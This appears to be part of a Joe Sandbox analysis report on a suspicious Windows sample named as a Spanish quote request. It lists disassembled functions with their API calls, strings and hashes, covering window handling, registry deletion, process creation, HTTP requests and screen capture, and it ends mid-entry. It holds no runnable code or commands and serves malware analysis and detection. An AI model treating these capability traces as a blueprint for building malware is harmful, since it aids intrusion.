GetDlgItem.USER32(?,000003EA), ref: 00265A6C
SetWindowTextW.USER32(00000000,?), ref: 00265A72
GetDlgItem.USER32(?,000003E9), ref: 00265A82
SetWindowTextW.USER32(00000000,?), ref: 00265A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00265AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00265AC3
GetWindowRect.USER32(?,?), ref: 00265ACC
_wcslen.LIBCMT ref: 00265B33
SetWindowTextW.USER32(?,?), ref: 00265B6F
GetDesktopWindow.USER32 ref: 00265B75
GetWindowRect.USER32(00000000), ref: 00265B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00265BD3
GetClientRect.USER32(?,?), ref: 00265BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00265C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00265C2F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 89de62350120ad461da6772865f7d1f64369955ca6ab217a3c402467a44b0014
Instruction ID: 912813132c3466eefdc5a163b34c9ffb2065129f78f14872fcb1cc00fb342c69
Opcode Fuzzy Hash: 89de62350120ad461da6772865f7d1f64369955ca6ab217a3c402467a44b0014
Instruction Fuzzy Hash: 71719031910B16EFDB20DFA8CE89AAEBBF5FF48704F100519E142A25A4D774E990CF50

Function 002630F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0026318D
_wcslen.LIBCMT ref: 002631F8

Strings

TEXT, xrefs: 0026347C
[,, xrefs: 0026339A
CLASS, xrefs: 00263188, 002631A5
CLASSNN, xrefs: 002631F3, 00263204
INSTANCE, xrefs: 00263453
REGEXPCLASS, xrefs: 00263255, 00263266
NAME, xrefs: 00263335, 00263346

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[,
API String ID: 176396367-3538303901
Opcode ID: af865e9831da34e8abb9063e02a7dff5bf74af327a9b0fb133d94e7ce3dcadff
Instruction ID: c160ecd0efd1ce232059a231d6a1719020498131b2f96a284b68189a9a7611d3
Opcode Fuzzy Hash: af865e9831da34e8abb9063e02a7dff5bf74af327a9b0fb133d94e7ce3dcadff
Instruction Fuzzy Hash: 79E1E532A20626ABCB14DFA8C451BEDFBB0BF54710F548259E456E7240DF70AEE58BD0

Function 002200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002200C6

Part of subcall function 002200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002D070C,00000FA0,E13B788C,?,?,?,?,002423B3,000000FF), ref: 0022011C
Part of subcall function 002200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002423B3,000000FF), ref: 00220127
Part of subcall function 002200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002423B3,000000FF), ref: 00220138
Part of subcall function 002200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0022014E
Part of subcall function 002200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0022015C
Part of subcall function 002200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0022016A
Part of subcall function 002200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00220195
Part of subcall function 002200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002201A0

___scrt_fastfail.LIBCMT ref: 002200E7

Part of subcall function 002200A3: __onexit.LIBCMT ref: 002200A9

Strings

WakeAllConditionVariable, xrefs: 00220162
kernel32.dll, xrefs: 00220133
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00220122
InitializeConditionVariable, xrefs: 00220148
SleepConditionVariableCS, xrefs: 00220154

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 223a87bd37882a9ed9dc10872db4107550080ea65aa21800fe8813828183797b
Instruction ID: 3baa09bc26e6c9715c4b9970e1388c469dfcdf846567bb44d353c258ff07d27a
Opcode Fuzzy Hash: 223a87bd37882a9ed9dc10872db4107550080ea65aa21800fe8813828183797b
Instruction Fuzzy Hash: 5B212C32A653217BE7505FF4BD8DB5973D4DB05B51F10012BF809D62A2DB645C208AA4

Function 002744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0029CC08), ref: 00274527
_wcslen.LIBCMT ref: 0027453B
_wcslen.LIBCMT ref: 00274599
_wcslen.LIBCMT ref: 002745F4
_wcslen.LIBCMT ref: 0027463F
_wcslen.LIBCMT ref: 002746A7

Part of subcall function 0021F9F2: _wcslen.LIBCMT ref: 0021F9FD

GetDriveTypeW.KERNEL32(?,002C6BF0,00000061), ref: 00274743

Strings

removable, xrefs: 002745EA, 002745EF
unknown, xrefs: 00274708
network, xrefs: 0027469D, 002746A2
fixed, xrefs: 00274635, 0027463A
ramdisk, xrefs: 002746F1
cdrom, xrefs: 0027458F, 00274594
all, xrefs: 00274531, 00274536

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 6bbd1830a364af1e417b087f906de528a49d9a02ff670ecdf9e3f2942a126aa1
Instruction ID: 6976679628b3dd34864b1d0138d2062966839014a11e5fe562c48110316d6c2f
Opcode Fuzzy Hash: 6bbd1830a364af1e417b087f906de528a49d9a02ff670ecdf9e3f2942a126aa1
Instruction Fuzzy Hash: 54B104716283039FC714EF28C890A6AF7E5AFA5724F508A1DF49AC7292D770DC64CB52

Function 0029911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

DragQueryPoint.SHELL32(?,?), ref: 00299147

Part of subcall function 00297674: ClientToScreen.USER32(?,?), ref: 0029769A
Part of subcall function 00297674: GetWindowRect.USER32(?,?), ref: 00297710
Part of subcall function 00297674: PtInRect.USER32(?,?,00298B89), ref: 00297720

SendMessageW.USER32(?,000000B0,?,?), ref: 002991B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002991BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002991DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00299225
SendMessageW.USER32(?,000000B0,?,?), ref: 0029923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00299255
SendMessageW.USER32(?,000000B1,?,?), ref: 00299277
DragFinish.SHELL32(?), ref: 0029927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00299371

Strings

@GUI_DROPID, xrefs: 0029929E
p#-, xrefs: 002992BB
@GUI_DRAGID, xrefs: 002992E9
@GUI_DRAGFILE, xrefs: 00299320

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#-
API String ID: 221274066-899051560
Opcode ID: 10fd8bba88a8abd26c7b72d194939ec85b6293a93362b0b6e920ac349d4a2fe7
Instruction ID: 8c307bb7ac8bcbd964786140333dac582805b9d6168002425e89c205744e8056
Opcode Fuzzy Hash: 10fd8bba88a8abd26c7b72d194939ec85b6293a93362b0b6e920ac349d4a2fe7
Instruction Fuzzy Hash: 82619C71518301AFD704DF64DC89DAFBBE8EF89350F500A1EF592921A1DB309A68CF62

Function 0028AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0028B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028B1D4
_wcslen.LIBCMT ref: 0028B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028B236
_wcslen.LIBCMT ref: 0028B332

Part of subcall function 002705A7: GetStdHandle.KERNEL32(000000F6), ref: 002705C6

_wcslen.LIBCMT ref: 0028B34B
_wcslen.LIBCMT ref: 0028B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0028B3B6
GetLastError.KERNEL32(00000000), ref: 0028B407
CloseHandle.KERNEL32(?), ref: 0028B439
CloseHandle.KERNEL32(00000000), ref: 0028B44A
CloseHandle.KERNEL32(00000000), ref: 0028B45C
CloseHandle.KERNEL32(00000000), ref: 0028B46E
CloseHandle.KERNEL32(?), ref: 0028B4E3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 03f9467954b3d77123e965af0c3979d162d89173f7b76a25ee7386e4664275c3
Instruction ID: 5c4a37476a7e900db099f32e5272ae6888969620ed2e7557a7690fcfdbccfc0b
Opcode Fuzzy Hash: 03f9467954b3d77123e965af0c3979d162d89173f7b76a25ee7386e4664275c3
Instruction Fuzzy Hash: 19F1AB355293019FC725EF24C891B6ABBE4AF85310F18855DF8998B2E2CB31EC64CF52

Function 0020326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(002D1990), ref: 00242F8D
GetMenuItemCount.USER32(002D1990), ref: 0024303D
GetCursorPos.USER32(?), ref: 00243081
SetForegroundWindow.USER32(00000000), ref: 0024308A
TrackPopupMenuEx.USER32(002D1990,00000000,?,00000000,00000000,00000000), ref: 0024309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002430A9

Strings

0, xrefs: 0020327D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 2c6986bd473a8aa5dbd38547599a0fa101e2ec880a5ad1b2cd78723ef64ff666
Instruction ID: 5980bb2dd8bd166e17346aa4e23f1e683628a6f92aedb4a678db6f9b6c78b170
Opcode Fuzzy Hash: 2c6986bd473a8aa5dbd38547599a0fa101e2ec880a5ad1b2cd78723ef64ff666
Instruction Fuzzy Hash: 09710771660206BEEB25CF65DC49F9ABF68FF01324F600206F914A61E1C7B1AD74CB50

Function 00296CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00296DEB

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00296E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00296E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00296E94
DestroyWindow.USER32(?), ref: 00296EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 00296EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00296EFD
GetDesktopWindow.USER32 ref: 00296F16
GetWindowRect.USER32(00000000), ref: 00296F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00296F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00296F4D

Part of subcall function 00219944: GetWindowLongW.USER32(?,000000EB), ref: 00219952

Strings

tooltips_class32, xrefs: 00296E58, 00296EDD
0, xrefs: 00296D98

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 16eca1a57cb1155254f42bd96130f90294cf8c09a176cd221071541f56612506
Instruction ID: e7359b06937505a700b0a6adf4c8e789ad15350531799e1588e6ee1fd3474b2e
Opcode Fuzzy Hash: 16eca1a57cb1155254f42bd96130f90294cf8c09a176cd221071541f56612506
Instruction Fuzzy Hash: D2717670514341AFDB25CF18EC58FBABBE9FB89304F54041EF98A972A1C770A926CB11

Function 0027C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0027C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0027C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0027C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027C5F0
InternetCloseHandle.WININET(00000000), ref: 0027C5FB

Strings

, xrefs: 0027C575

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 2e6397dd1c698c4bebb71b38a6ffe1fc7bdf46c2e48c191da232edea11091ed3
Instruction ID: 25df4dea2ab612fb0642716d1daaf70ceab3596bfe830c8cdc376ee277e53abc
Opcode Fuzzy Hash: 2e6397dd1c698c4bebb71b38a6ffe1fc7bdf46c2e48c191da232edea11091ed3
Instruction Fuzzy Hash: 64516CB1510609BFDB218FB1DD88AAB7BBCFF08754F60841EF949A6210DB31E9549B60

Function 0029856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00298592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985BA
GlobalLock.KERNEL32(00000000), ref: 002985C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985D7
GlobalUnlock.KERNEL32(00000000), ref: 002985E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002985F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0029FC38,?), ref: 00298611
GlobalFree.KERNEL32(00000000), ref: 00298621
GetObjectW.GDI32(?,00000018,?), ref: 00298641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00298671
DeleteObject.GDI32(?), ref: 00298699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002986AF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 6b36a7f2c663c164515bcf65e6e1b173a0b534e823ec1839ee52c261b7b68c52
Instruction ID: 4e58f95636561e6c5122b6a532d7587ff8910a54dd0666e81c22fdadbd6ae028
Opcode Fuzzy Hash: 6b36a7f2c663c164515bcf65e6e1b173a0b534e823ec1839ee52c261b7b68c52
Instruction Fuzzy Hash: 6A411975600205AFDB11DFA5DD4CEAA7BBCFF8A711F254059F909EB260DB709901CB60

Function 002714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00271502
VariantCopy.OLEAUT32(?,?), ref: 0027150B
VariantClear.OLEAUT32(?), ref: 00271517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002715FB
VarR8FromDec.OLEAUT32(?,?), ref: 00271657
VariantInit.OLEAUT32(?), ref: 00271708
SysFreeString.OLEAUT32(?), ref: 0027178C
VariantClear.OLEAUT32(?), ref: 002717D8
VariantClear.OLEAUT32(?), ref: 002717E7
VariantInit.OLEAUT32(00000000), ref: 00271823

Strings

Default, xrefs: 002716AF
%4d%02d%02d%02d%02d%02d, xrefs: 00271625

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 9ecd9d7f92981a1bf17cab3c4dcea61ce334ef972ab9d3ac084bd3f509dbe483
Instruction ID: 09c7ac6c3a0d56e490b2a5ca25bd0d43cfabe3193680ffb7318f959238e37358
Opcode Fuzzy Hash: 9ecd9d7f92981a1bf17cab3c4dcea61ce334ef972ab9d3ac084bd3f509dbe483
Instruction Fuzzy Hash: 7FD11371A20206EBDF189F69E889BB9B7B5BF45700F64C056E40AAB181DB70DC70DB61

Function 0028B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Part of subcall function 0028C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028B6AE,?,?), ref: 0028C9B5
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028C9F1
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA68
Part of subcall function 0028C998: _wcslen.LIBCMT ref: 0028CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0028B80A
RegCloseKey.ADVAPI32(?), ref: 0028B87E
RegCloseKey.ADVAPI32(?), ref: 0028B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0028B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0028B922
FreeLibrary.KERNEL32(00000000), ref: 0028B983
RegCloseKey.ADVAPI32(00000000), ref: 0028B994

Strings

advapi32.dll, xrefs: 0028B8ED
RegDeleteKeyExW, xrefs: 0028B8FE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 747dfc3abcee9289218d259a69465889a3acb34933b80d960e17c7fdb53669c5
Instruction ID: 2dc87e0fb4536e1c3e968f998065cf48fec7f75b99d696eae554275b2c964ad6
Opcode Fuzzy Hash: 747dfc3abcee9289218d259a69465889a3acb34933b80d960e17c7fdb53669c5
Instruction Fuzzy Hash: CBC18A35225302AFD711EF14C494F2ABBE5AF84308F24859CE59A8B6E2CB71E855CF91

Function 0028255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002825D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002825E8
CreateCompatibleDC.GDI32(?), ref: 002825F4
SelectObject.GDI32(00000000,?), ref: 00282601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0028266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002826AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002826D0
SelectObject.GDI32(?,?), ref: 002826D8
DeleteObject.GDI32(?), ref: 002826E1
DeleteDC.GDI32(?), ref: 002826E8
ReleaseDC.USER32(00000000,?), ref: 002826F3

Strings

(, xrefs: 0028268D

Memory Dump Source

